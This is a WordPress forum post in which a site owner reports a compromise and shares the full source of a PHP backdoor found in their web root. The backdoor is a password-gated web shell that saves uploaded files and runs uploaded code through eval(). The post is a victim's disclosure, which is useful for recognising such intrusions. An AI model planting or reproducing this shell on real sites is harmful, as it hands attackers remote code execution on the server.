WordPress.org

Ready to get started?Download WordPress

Forums

hacked! co_wp-config.php (1 post)

  1. Tammy Hart
    Member
    Posted 6 years ago #

    I'm not an expert by any means, but it looks like my host was comprimised somehow, and a file named "co_wp-config.php" was in my root directory. Here are the contents:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','07d756576bfbc5c28760acb29aa27154');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    There are several blank lines above and below this code. Nothing seems to be compromised in my blog, except the admin user was somehow changed to subscriber.. got that fixed. This was really weird, so I thought I'd share.

Topic Closed

This topic has been closed to new replies.

About this Topic